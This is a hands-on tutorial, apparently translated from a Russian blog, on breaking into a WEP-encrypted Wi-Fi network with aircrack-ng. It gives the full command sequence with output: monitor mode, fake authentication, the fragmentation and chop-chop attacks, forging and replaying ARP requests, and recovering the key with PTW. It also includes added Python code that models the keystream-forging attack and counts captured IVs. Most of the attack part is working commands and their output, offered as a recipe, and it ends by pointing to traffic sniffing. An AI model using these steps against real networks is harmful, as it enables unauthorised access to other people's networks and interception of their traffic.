
Practical attack on a wireless network with WEP encryption

The theory behind the attack was described well by the user n3m0 in the articles "Attacks on Wireless Networks", but the practical side there is covered rather thinly.

This article walks through the practical process of attacking a wireless network protected by WEP, using the aircrack-ng suite on the OpenSuse operating system.

Programs


The aircrack-ng package is in the repositories of almost every GNU/Linux distribution. There is also a Windows port, but Linux was chosen because its wireless drivers offer far better support for monitor mode and packet injection.
Installation
# zypper in aircrack-ng

After installation the hardware became a problem: the laptop's built-in Wi-Fi adapter flatly refused to talk to the access point because of the weak signal. So a TrendNet TEW-424UB USB adapter was used instead.
# lsusb | grep Net
Bus 001 Device 002: ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter


The adapter's driver works with airodump-ng out of the box, and for aireplay-ng I did not have to apply any mac80211 patch.
(The aircrack-ng site has a driver compatibility list.)
dmesg shows that the interface does not come up automatically, but we do not need that anyway:
[ 2609.580074] rtl8187: Customer ID is 0x00
[ 2609.580144] Registered led device: rtl8187-phy1::tx
[ 2609.580171] Registered led device: rtl8187-phy1::rx
[ 2617.830502] ADDRCONF(NETDEV_UP): wlan0: link is not ready


Scanning the air
We put the adapter into monitor mode.
# airmon-ng start wlan0

Interface Chipset Driver

eth1 Intel 2200BG ipw2200
wlan0 RTL8187 rtl8187 - [phy1]
(monitor mode enabled on mon0)


All attack traffic goes through the virtual interface mon0; the original wlan0 stays in managed mode.
# iwconfig wlan0
wlan0 IEEE 802.11bg ESSID:""
Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
# iwconfig mon0
mon0 IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz Tx-Power=20 dBm


Now we start the process of scanning available wireless networks.
# airodump-ng mon0
[screenshot: airodump-ng output listing the visible access points and clients]
The fields in the output mean the following:

We will attack the network whose ESSID is, literally, ESSID. As you can see, it is on channel 6. You could simply pass -c 6 to airodump-ng, but for learning purposes we will tear down the monitor interface and recreate it locked to channel 6:
# airmon-ng stop mon0
mon0 RTL8187 rtl8187 - [phy1] (removed)
# airmon-ng start wlan0 6
wlan0 RTL8187 rtl8187 - [phy1]
(monitor mode enabled on mon0)


Wi-Fi channels partially overlap
[figure: 2.4 GHz channel overlap diagram]
so even when tuned to one channel we will also pick up frames from access points on neighbouring channels. Therefore we lock airodump-ng to the channel and additionally filter by BSSID. The -w option sets the file prefix the captured data is written to.
# airodump-ng -c 6 --bssid 00:1B:11:E7:DD:D5 -w essid.out mon0

From here you can either sit and wait until enough data packets (that is, enough distinct IVs) have been captured and go straight to key recovery, or speed things up with active attacks.

Active attacks.
First, to verify that the access point hears our frames and that the driver supports everything we need, try a fake authentication against the AP. If a client is not authenticated and associated, the AP will not accept its packets. We authenticate:
# aireplay-ng -1 0 -e ESSID mon0
No source MAC (-h) specified. Using the device MAC (00:14:D1:30:7F:46)
19:30:28 Waiting for beacon frame (ESSID: ESSID) on channel 6
Found BSSID "00:1B:11:E7:DD:D5" to given ESSID "ESSID".
19:30:28 Sending Authentication Request (Open System) [ACK]
19:30:28 Authentication successful
19:30:28 Sending Association Request [ACK]
19:30:28 Association successful :-) (AID: 1)


At the same time, check that packet injection works.
# aireplay-ng -9 -e ESSID mon0
19:31:35 Waiting for beacon frame (ESSID: ESSID) on channel 6
Found BSSID "00:1B:11:E7:DD:D5" to given ESSID "ESSID".
19:31:35 Trying broadcast probe requests...
19:31:35 Injection is working!
19:31:36 Found 1 AP
19:31:36 Trying directed probe requests...
19:31:36 00:1B:11:E7:DD:D5 - channel: 6 - 'ESSID'
19:31:37 Ping (min/avg/max): 0.771ms/6.558ms/11.080ms Power: -48.50
19:31:37 30/30: 100%


Success, so active attacks can be used against this AP.
Deauthenticating an existing client is usually not worth it: it can reveal the attack. So we use the fragmentation attack instead. It still needs one encrypted data frame from the AP as a starting point, which is what aireplay-ng is waiting for below.
# aireplay-ng -5 -b 00:1B:11:E7:DD:D5 mon0
No source MAC (-h) specified. Using the device MAC (00:14:D1:30:7F:46)
19:37:26 Waiting for beacon frame (BSSID: 00:1B:11:E7:DD:D5) on channel 6
19:37:26 Waiting for a data packet...
Read 362 packets...


Even an otherwise idle access point has a wired side behind it, and sooner or later it forwards a broadcast frame (here one from 00:22:43:01:C6:7F, FromDS: 1) into the air. That is all the fragmentation attack needs.
Size: 277, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:1B:11:E7:DD:D5
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:22:43:01:C6:7F

0x0000: 0842 0000 ffff ffff ffff 001b 11e7 ddd5 .B..............
0x0010: 0022 4301 c67f 8009 3a1f 0000 0eb0 723b ."C....:.....r;
0x0020: c25a 0453 0691 0afa 5ae3 4365 c309 9094 .ZS...Z.Ce....
0x0030: b0f9 90a9 65bf 1785 9f0a 65fa ba5a cb7d ....e.....e..Z.}
0x0040: f357 7167 c133 1efd ca2e 4ec9 9133 ea20 .Wqg.3....N..3.
0x0050: e508 c7af fce3 bbf3 599d c4a9 e01d 5e4f ........Y.....^O
0x0060: 88e8 9997 a5ef 3f0f 058f 3c8a 100f d667 ......?...<....g
0x0070: 2f0f 9f47 a3b0 f4cd 25f8 2cd4 af9e 157c /..G....%.,....|
0x0080: c456 5232 6903 eb5b e935 5dd2 9816 f94c .VR2i..[.5]....L
0x0090: 18ab ea4c aabd 11ed 41a3 88c9 a5ac 726c ...L....A.....rl
0x00a0: 3b81 024c 5cfe 24d9 78a5 339b 02aa e147 ;..L\.$.x.3....G
0x00b0: eeb2 512c 1d52 aaa0 2992 88a7 be2a cd6d ..Q,.R..)....*.m
0x00c0: ab44 3248 619c 2402 8cda 621e ed9c 9109 .D2Ha.$...b.....
0x00d0: 62e9 23f7 be38 5f6f bfc9 da45 310a 6957 b.#..8_o...E1.iW
--- CUT ---

Use this packet ? Y

Saving chosen packet in replay_src-0427-193751.cap
19:38:22 Data packet found!
19:38:22 Sending fragmented packet
19:38:23 No answer, repeating...
19:38:23 Trying a LLC NULL packet
19:38:23 Sending fragmented packet
19:38:25 Not enough acks, repeating...
19:38:25 Trying a LLC NULL packet
19:38:25 Sending fragmented packet
19:38:27 No answer, repeating...
19:38:27 Sending fragmented packet
19:38:27 Got RELAYED packet!!
19:38:27 Trying to get 384 bytes of a keystream
19:38:27 Not enough acks, repeating...
19:38:27 Trying to get 384 bytes of a keystream
19:38:28 No answer, repeating...
19:38:28 Trying to get 384 bytes of a keystream
19:38:28 Trying a LLC NULL packet
19:38:28 Not enough acks, repeating...
19:38:28 Trying to get 384 bytes of a keystream
19:38:28 Trying a LLC NULL packet
19:38:30 No answer, repeating...
19:38:30 Trying to get 384 bytes of a keystream
19:38:30 Got RELAYED packet!!
19:38:30 Trying to get 1500 bytes of a keystream
19:38:30 Got RELAYED packet!!
Saving keystream in fragment-0427-193830.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream


The AP relayed the fragments, so it is susceptible to the fragmentation attack. If an AP does not relay them, try the chop-chop method proposed by KoreK instead:
# aireplay-ng -4 -e ESSID mon0
19:42:08 Waiting for beacon frame (ESSID: ESSID) on channel 6
Found BSSID "00:1B:11:E7:DD:D5" to given ESSID "ESSID".
Read 182 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)
.....
Use this packet ? y
Saving chosen packet in replay_src-0427-194221.cap

Offset 85 ( 0% done) | xor = D5 | pt = BF | 838 frames written in 14259ms
Offset 84 ( 1% done) | xor = 9B | pt = 57 | 1293 frames written in 21971ms
Offset 83 ( 3% done) | xor = 92 | pt = A8 | 2567 frames written in 43637ms


You can see how much longer it takes me than in the example on the site, because of the weak signal to the AP. From the aircrack-ng website:
Offset 85 ( 0% done) | xor = D3 | pt = 95 | 253 frames written in 760ms
Offset 84 ( 1% done) | xor = EB | pt = 55 | 166 frames written in 498ms
Offset 83 ( 3% done) | xor = 47 | pt = 35 | 215 frames written in 645ms


Either method yields a .xor file containing a chunk of keystream (the output of RC4's PRGA, the pseudo-random generation algorithm) for one IV. Because the AP never checks for IV reuse, that keystream is enough to forge an encrypted ARP request without knowing the key, and replaying it makes the AP answer with a stream of freshly encrypted frames, each carrying a new IV. In packetforge-ng, -0 selects an ARP packet, -a is the BSSID, -h the source MAC of the forged frame, -k the destination IP, -l the source IP, -y the keystream file and -w the output file. Note that the -h used here is not the adapter MAC (00:14:D1:30:7F:46) that was fake-authenticated; an AP that enforces association drops frames from stations it has not associated, so normally you would use that MAC.
# packetforge-ng -0 -a 00:1B:11:E7:DD:D5 -h 00:09:5B:EC:EE:F2 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0427-193830.xor -w arp-request
Wrote packet to: arp-request
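
The Python model below is an added example and not code from the original article or from aircrack-ng. It shows the property that both the fragmentation attack (aireplay-ng -5, above) and packetforge-ng rely on: a WEP payload is IV || RC4(IV || key) XOR (body || CRC-32), the IV is sent in the clear and the receiver never checks whether an IV was used before. So eight known bytes of keystream (the LLC/SNAP header that starts every ARP body) are enough to forge fragments the AP will accept, reassemble and re-encrypt; the relayed frame reveals a keystream about 16 times longer, and a couple of rounds give a keystream under which any frame, such as the ARP request above, can be built. The key, IVs, frame bodies (no 802.11 header is modelled) and the fragment sizes are constructed for the demo and simplified relative to aireplay-ng's real steps.

```python
"""Toy model of WEP keystream recovery, the fragmentation attack and packet forging.
Added example, not code from the original article or from aircrack-ng.
WEP payload = IV || RC4(IV || key) XOR (body || CRC32(body)); the key, IVs, frame
bodies and fragment sizes below are constructed for the demo."""
import os
import zlib

SNAP_ARP = bytes.fromhex("aaaa030000000806")  # LLC/SNAP header of every ARP body: known plaintext
MAX_FRAGMENTS = 16   # 802.11 lets a frame be split into at most 16 fragments
TARGET_BODY = 1504   # stop once the keystream covers a full-size (1500-byte) body


def rc4(key: bytes, n: int) -> bytes:
    """First n bytes of RC4 keystream for `key` (key scheduling + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(body: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(body).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, body: bytes) -> bytes:
    """Legitimate station or AP: IV in the clear, then RC4(IV||key) XOR (body||ICV)."""
    return iv + xor(rc4(iv + key, len(body) + 4), body + icv(body))


def wep_decrypt(key: bytes, frame: bytes):
    """Receiver: decrypt under IV||key and check the ICV; None means the frame is dropped."""
    iv, ct = frame[:3], frame[3:]
    pt = xor(rc4(iv + key, len(ct)), ct)
    return pt[:-4] if pt[-4:] == icv(pt[:-4]) else None


def keystream_from_known_plaintext(frame: bytes, known: bytes) -> tuple:
    """Attacker: ciphertext XOR known plaintext = keystream bytes for that IV (no key needed)."""
    return frame[:3], xor(frame[3:3 + len(known)], known)


def forge(iv: bytes, keystream: bytes, body: bytes) -> bytes:
    """What packetforge-ng does with a .xor file: a valid frame under a reused IV."""
    if len(keystream) < len(body) + 4:
        raise ValueError("keystream too short for this body")
    return iv + xor(keystream, body + icv(body))


class AccessPoint:
    """Minimal WEP AP: verifies each fragment, reassembles, and relays the whole
    frame back to the air re-encrypted under a fresh IV (as it does for broadcast)."""

    def __init__(self, key: bytes):
        self.key = key

    def relay(self, fragments: list):
        bodies = [wep_decrypt(self.key, f) for f in fragments]
        if len(fragments) > MAX_FRAGMENTS or None in bodies:
            return None
        return wep_encrypt(self.key, os.urandom(3), b"".join(bodies))


def fragmentation_attack(ap: AccessPoint, iv: bytes, keystream: bytes) -> tuple:
    """aireplay-ng -5 in miniature: each fragment carries (keystream - 4) bytes of chosen
    plaintext plus its ICV; the relayed frame reveals a keystream up to 16x as long."""
    while len(keystream) < TARGET_BODY + 4:
        chunk = min(len(keystream) - 4, TARGET_BODY // MAX_FRAGMENTS)
        chosen = [bytes([i]) * chunk for i in range(MAX_FRAGMENTS)]  # any plaintext we like
        relayed = ap.relay([forge(iv, keystream, c) for c in chosen])
        if relayed is None:
            raise RuntimeError("AP did not relay the fragments: try chop-chop instead")
        full = b"".join(chosen)
        iv, keystream = keystream_from_known_plaintext(relayed, full + icv(full))
    return iv, keystream


if __name__ == "__main__":
    key = bytes.fromhex("5181824107")            # constructed 40-bit key
    ap = AccessPoint(key)
    sniffed = wep_encrypt(key, b"\x3a\x1f\x00", SNAP_ARP + os.urandom(28))  # a broadcast ARP
    iv, ks = keystream_from_known_plaintext(sniffed, SNAP_ARP)              # 8 bytes of keystream
    iv, ks = fragmentation_attack(ap, iv, ks)                               # grown to 1508 bytes
    arp = forge(iv, ks, SNAP_ARP + bytes.fromhex("0001080006040001") + os.urandom(20))
    print(len(ks), wep_decrypt(key, arp) is not None)
```

Two things worth noticing in the model: the forged frames never touch the key, only the (IV, keystream) pair, and the ICV is a plain CRC-32 of the plaintext, so the AP has no way to tell a forged frame from a legitimate one. The same two weaknesses are what the chop-chop attack exploits by a different route.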


Now inject this packet into the network.
# aireplay-ng -2 -r arp-request mon0
No source MAC (-h) specified. Using the device MAC (00:14:D1:30:7F:46)

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:1B:11:E7:DD:D5
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:09:5B:EC:EE:F2

0x0000: 0841 0201 001b 11e7 ddd5 0009 5bec eef2 .A..........[...
0x0010: ffff ffff ffff 8001 471f 0000 548b 4dde ........G...TM
0x0020: 5747 3254 b5ff 7b7d b389 dbe9 7a9e 389c WG2T..{}....z.8.
0x0030: ce3e 85a3 384f 2858 b612 8532 b57e f3ad .>..8O(X...2.~..
0x0040: 420c 26b8 B.&.

Use this packet ? y
Saving chosen packet in replay_src-0427-195956.cap
You should also start airodump-ng to capture replies.

Sent 1301 packets...(500 pps)


At the same time the number of data packets received from the AP should rise sharply. In my case it did not. Strange. Let's check injection again.
# aireplay-ng -9 -e ESSID mon0
20:02:47 Waiting for beacon frame (ESSID: ESSID) on channel 6
Found BSSID "00:1B:11:E7:DD:D5" to given ESSID "ESSID".
20:02:47 Trying broadcast probe requests...
20:02:48 Injection is working!
20:02:48 Found 1 AP

20:02:48 Trying directed probe requests...
20:02:48 00:1B:11:E7:DD:D5 - channel: 6 - 'ESSID'
20:02:49 Ping (min/avg/max): 0.796ms/6.685ms/10.849ms Power: -48.67
20:02:49 27/30: 90%


It works. Let's rebuild the ARP request so that it looks as if it came from the real network. Users usually leave the default 192.168.1.0/24 addressing in place, so use 192.168.1.1 as the target (-k) and 192.168.1.250 as the sender (-l). Restart airodump-ng at the same time.
# packetforge-ng -0 -a 00:1B:11:E7:DD:D5 -h 00:09:5B:EC:EE:F2 -k 192.168.1.1 -l 192.168.1.250 -y fragment-0427-193830.xor -w arp-request1
Wrote packet to: arp-request1
# aireplay-ng -2 -r arp-request1 mon0
.......
Sent 799 packets...(499 pps)


[screenshot: airodump-ng with the #Data counter for the target BSSID climbing rapidly]

Now it works: data packets arrive at about 300 per second, 30,000 of them in under three minutes. Let's try to recover the key.
# aircrack-ng essid.out-0*.cap
Opening essid.out-01.cap
Opening essid.out-02.cap
Reading packets, please wait...

Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 37621 ivs.
KEY FOUND! [ 51:81:82:41:07 ]
Decrypted correctly: 100%
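
airodump-ng's #Data column counts data frames, while the PTW attack above works on distinct IVs (37,621 of them here), so before leaving aircrack-ng to run it is worth knowing how many unique IVs a capture really holds and how often IVs are being reused. The script below is an added example, not part of the original article or of aircrack-ng: it walks a classic pcap file with link type 105 (raw IEEE 802.11 frames, which is what airodump-ng writes without radiotap headers), picks out WEP-protected data frames by the Protected bit and the absence of the Ext IV flag, and reports per-BSSID frame, unique-IV and IV-reuse counts. The capture at the bottom is constructed inline (the BSSID, station MAC and IVs are taken from the hex dumps above) so the script runs offline; point `iv_stats` at the bytes of a real essid.out-01.cap to use it for real.

```python
"""Count WEP IVs per BSSID in an airodump-ng style capture before running aircrack-ng.
Added example, not code from the original article or from aircrack-ng. Reads classic
pcap files with link type 105 (raw IEEE 802.11 frames, no radiotap header); the
sample capture at the bottom is constructed inline so the script runs offline."""
import struct
from collections import defaultdict

LINKTYPE_IEEE802_11 = 105


def pcap_packets(data: bytes):
    """Yield the raw packet bytes of a classic (non-pcapng) pcap blob."""
    endian = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(data[:4])
    if endian is None:
        raise ValueError("not a classic pcap file")
    linktype = struct.unpack(endian + "I", data[20:24])[0]
    if linktype != LINKTYPE_IEEE802_11:
        raise ValueError(f"expected link type 105 (IEEE 802.11), got {linktype}")
    off = 24
    while off + 16 <= len(data):
        caplen = struct.unpack(endian + "IIII", data[off:off + 16])[2]
        off += 16
        yield data[off:off + caplen]
        off += caplen


def wep_iv(frame: bytes):
    """(bssid, iv) for a WEP-protected 802.11 data frame, None for anything else."""
    if len(frame) < 28:
        return None
    fc = frame[0] | frame[1] << 8
    ftype, subtype = (fc >> 2) & 3, (fc >> 4) & 0xF
    to_ds, from_ds, protected = fc & 0x0100, fc & 0x0200, fc & 0x4000
    if ftype != 2 or not protected or subtype & 0x4:      # not data, not encrypted, or null data
        return None
    if to_ds and from_ds:                                # WDS frame with 4 addresses: skip
        return None
    hdr = 26 if subtype & 0x8 else 24                    # QoS data adds a 2-byte QoS control
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    bssid = a1 if to_ds else a2 if from_ds else a3       # 802.11 address rules per DS bits
    if frame[hdr + 3] & 0x20:                            # Ext IV bit set: TKIP/CCMP, not WEP
        return None
    return bssid.hex(":"), frame[hdr:hdr + 3].hex()


def iv_stats(pcap: bytes) -> dict:
    """Per BSSID: WEP data frames seen, distinct IVs, and the most-reused IV's count."""
    seen = defaultdict(lambda: defaultdict(int))
    for pkt in pcap_packets(pcap):
        hit = wep_iv(pkt)
        if hit:
            seen[hit[0]][hit[1]] += 1
    return {b: {"frames": sum(ivs.values()), "unique_ivs": len(ivs),
                "max_reuse": max(ivs.values())} for b, ivs in seen.items()}


# ---- constructed sample capture (not a real airodump-ng file) ----
def wep_data_frame(bssid: bytes, peer: bytes, iv: bytes, from_ds: bool = True, keyid: int = 0) -> bytes:
    fc = b"\x08\x42" if from_ds else b"\x08\x41"        # data frame, Protected, FromDS or ToDS
    bcast = b"\xff" * 6
    addrs = bcast + bssid + peer if from_ds else bssid + peer + bcast
    return fc + b"\x00\x00" + addrs + b"\x80\x09" + iv + bytes([keyid]) + bytes(36)


def sample_capture() -> bytes:
    ap, ap2 = bytes.fromhex("001b11e7ddd5"), bytes.fromhex("001122334455")
    sta = bytes.fromhex("00224301c67f")
    frames = [
        wep_data_frame(ap, sta, bytes.fromhex("3a1f00")),
        wep_data_frame(ap, sta, bytes.fromhex("471f00"), from_ds=False),
        wep_data_frame(ap, sta, bytes.fromhex("3a1f00")),               # IV reused
        wep_data_frame(ap, sta, bytes.fromhex("0c5b91")),
        wep_data_frame(ap2, sta, bytes.fromhex("010203")),
        wep_data_frame(ap2, sta, bytes.fromhex("010203"), keyid=0x20),   # Ext IV: TKIP/CCMP, ignored
        b"\x80\x00" + bytes(34),                                         # beacon: management, ignored
    ]
    hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    return hdr + b"".join(struct.pack("<IIII", 0, 0, len(f), len(f)) + f for f in frames)


if __name__ == "__main__":
    for bssid, st in iv_stats(sample_capture()).items():
        print(f"{bssid}: {st['frames']} WEP frames, {st['unique_ivs']} unique IVs, max reuse {st['max_reuse']}")
```

The aircrack-ng documentation gives rough figures for PTW of around 20,000 distinct IVs for a 40-bit key and 40,000 to 85,000 for a 104-bit key, which is consistent with the 37,621 IVs that recovered the 40-bit key above. A high `max_reuse` is itself a sign of how broken WEP is: a 24-bit IV space is exhausted in minutes at 300 packets per second, and every reused IV hands an attacker two ciphertexts under the same keystream.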


Enter the key in the client and connect. Now you could run ARP spoofing and sniff the traffic, but that is for the next article.

This information is provided for reference only. The author reminds you of Article 272 of the Criminal Code of the Russian Federation, "Illegal access to computer information".

Source: https://habr.com/ru/post/92681/

